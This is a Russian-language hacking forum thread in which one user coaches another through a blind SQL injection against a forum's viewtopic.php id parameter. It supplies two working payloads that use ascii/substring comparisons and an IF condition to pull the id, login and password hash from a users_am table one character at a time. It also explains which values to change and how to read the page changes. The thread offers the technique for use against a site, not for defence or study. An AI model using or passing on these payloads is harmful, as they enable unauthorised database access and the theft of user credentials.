Сообщение от
[c0de
"]
[c0de] said:
BigBear
Так нету пароля, известно только что поле есть password а там хэш пароля
Запрос не работает к сожалению. Страница меняется
Суть такая, проверял наличие таблиц, если такая есть => страница без изменений
Нету => пропадают стили, скрипты
В запросе пробелы где нужно убрал если что.
А куда запрос должен был то вывестись? Скуля то слепая
Да, с slelect очепятался, бывает =)
если блайнд то тут 2 вариант на выбор
Код:
test.ru/forum/viewtopic.php?id=1'+and+ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50+and+1='1
или
Код:
test.ru/forum/viewtopic.php?id=1+and+1=IF(ascii(substring(select+concat(id,0x3a,login,0x3a,password)+from+users_am+limit+0,1),1,1)>50,1,2)+and+1='1
Цветом выделены динамические переменные
1ая отвечает за номер записи в бд users_am (по дефолту идёт считывание данных из 1-ой записи)
2ая отвечает за порядок извлекаемого символа из строки id:login: password (по дефолту идёт извлечение первого символа)
3ья отвечает за код ascii символа в десятичном формате (Dec), по нему будешь ориентироваться, какой символ стоит на каком месте
Если в процессе будешь получить НЕ ПУСТУЮ страницу - значит запрос получился верный.
То есть в id:login: password на {1} строке таблицы users_am на позиции {2} находится ascii символ {3}
Знаю, что сложнова-то для восприятия, но как мог так помог =)